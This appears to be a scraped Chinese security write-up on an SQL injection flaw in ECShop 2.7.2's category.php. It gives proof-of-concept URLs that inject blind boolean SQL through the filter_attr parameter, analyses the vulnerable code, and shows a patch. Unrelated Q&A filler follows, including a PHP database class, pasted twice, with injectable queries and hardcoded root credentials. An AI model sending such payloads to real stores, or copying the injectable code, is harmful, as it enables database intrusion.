ecshop /category.php SQL Injection Vul
. 漏洞描述2. 漏洞触发条件3. 漏洞影响范围4. 漏洞代码分析5. 防御方法6. 攻防思考
1. 漏洞描述
Relevant Link:
http://sebug.net/vuldb/ssvid-19574
2. 漏洞触发条件
0x1: POC
http://localhost/ecshop2.7.2/category.php?page=1&sort=goods_id&order=ASC%23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999%20OR%20length(session_user())=14%20or%201=2http://localhost/ecshop2.7.2/category.php?page=1&sort=goods_id&order=ASC%23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999%20OR%20length(session_user())=145%20or%201=2
3. 漏洞影响范围4. 漏洞代码分析
/category.php
..$filter_attr_str = isset($_REQUEST[‘filter_attr‘]) ? trim($_REQUEST[‘filter_attr‘]) : ‘0‘;//变量 $filter_attr_str 是以“.” 分开的数组$filter_attr = empty($filter_attr_str) ? ‘‘ : explode(‘.‘, trim($filter_attr_str));.. /* 扩展商品查询条件 */if (!empty($filter_attr)){ $ext_sql = "SELECT DISTINCT(b.goods_id) FROM " . $ecs->table(‘goods_attr‘) . " AS a, " . $ecs->table(‘goods_attr‘) . " AS b " . "WHERE "; $ext_group_goods = array(); foreach ($filter_attr AS $k => $v) // 查出符合所有筛选属性条件的商品id */ { if ($v != 0) { //$v 没有作任何处理就加入了SQL查询,造成SQL注入 $sql = $ext_sql . "b.attr_value = a.attr_value AND b.attr_id = " . $cat_filter_attr[$k] ." AND a.goods_attr_id = " . $v; ..5. 防御方法
/category.php
../*对用户输入的$_REQUEST[‘filter_attr‘]进行转义 */$filter_attr_str = isset($_REQUEST[‘filter_attr‘]) ? htmlspecialchars(trim($_REQUEST[‘filter_attr‘])) : ‘0‘;/* */$filter_attr_str = trim(urldecode($filter_attr_str));/* 敏感关键字过滤 */$filter_attr_str = preg_match(‘/^[d.]+$/‘,$filter_attr_str) ? $filter_attr_str : ‘‘;/**/$filter_attr = empty($filter_attr_str) ? ‘‘ : explode(‘.‘, $filter_attr_str);..foreach ($filter_attr AS $k => $v) // 查出符合所有筛选属性条件的商品id */{ /* is_numeric($v) */ if (is_numeric($v) && $v !=0 ) { ..6. 攻防思考
Copyright (c) 2015 LittleHann All rights reserved
ecshop /category.php SQL Injection Vul
标签:
小编还为您整理了以下内容,可能对您也有帮助:
帮忙改改这个类好吗- -php的
代码试修改如下:
<?php
//header('Content-type:text/html;charset=utf-8');
class mydb
{
public $conn;
function __construct()
{
$this->conn = mysql_connect("localhost", "root", "123456");
if (!$this->conn) {
die('无法连接到数据库,错误: ' . mysql_error());
}
mysql_select_db("new",$this->conn);
mysql_query("SET NAMES UTF8",$this->conn);
}
function __destruct()
{
mysql_close($this->conn);
}
function fc($aid, $bid)
{
$sql = "SELECT * from foruma where aid=$aid";
$results = mysql_query($sql,$this->conn);
while ($rs = mysql_fetch_array($results,MYSQL_ASSOC))
{
echo $rs['name'];
}
$sql = "SELECT * from forumc where bid=$bid";
$results = mysql_query($sql,$this->conn);
while ($rs = mysql_fetch_array($result))
{
echo $rs['nameb'];
echo '<hr/>';
}
mysql_free_result($results);
}
}
$dbf = new mydb();
$dbf->fc("1",'2');
?>
帮忙改改这个类好吗- -php的
代码试修改如下:
<?php
//header('Content-type:text/html;charset=utf-8');
class mydb
{
public $conn;
function __construct()
{
$this->conn = mysql_connect("localhost", "root", "123456");
if (!$this->conn) {
die('无法连接到数据库,错误: ' . mysql_error());
}
mysql_select_db("new",$this->conn);
mysql_query("SET NAMES UTF8",$this->conn);
}
function __destruct()
{
mysql_close($this->conn);
}
function fc($aid, $bid)
{
$sql = "SELECT * from foruma where aid=$aid";
$results = mysql_query($sql,$this->conn);
while ($rs = mysql_fetch_array($results,MYSQL_ASSOC))
{
echo $rs['name'];
}
$sql = "SELECT * from forumc where bid=$bid";
$results = mysql_query($sql,$this->conn);
while ($rs = mysql_fetch_array($result))
{
echo $rs['nameb'];
echo '<hr/>';
}
mysql_free_result($results);
}
}
$dbf = new mydb();
$dbf->fc("1",'2');
?>
ecshop json_str_iconv()这个方法什么意思
iconv也是用来转换字符串编码的,与上函数功能相似。
下面还有一些详细的例子:
iconv — Convert string to requested character encoding
(PHP 4 >= 4.0.5, PHP 5)
mb_convert_encoding — Convert character encoding
(PHP 4 >= 4.0.6, PHP 5)
用法:
string mb_convert_encoding ( string str, string to_encoding [, mixed from_encoding] )
需要先enable mbstring 扩展库,在 php.ini里将; extension=php_mbstring.dll 前面的 ; 去掉
mb_convert_encoding 可以指定多种输入编码,它会根据内容自动识别,但是执行效率比iconv差太多;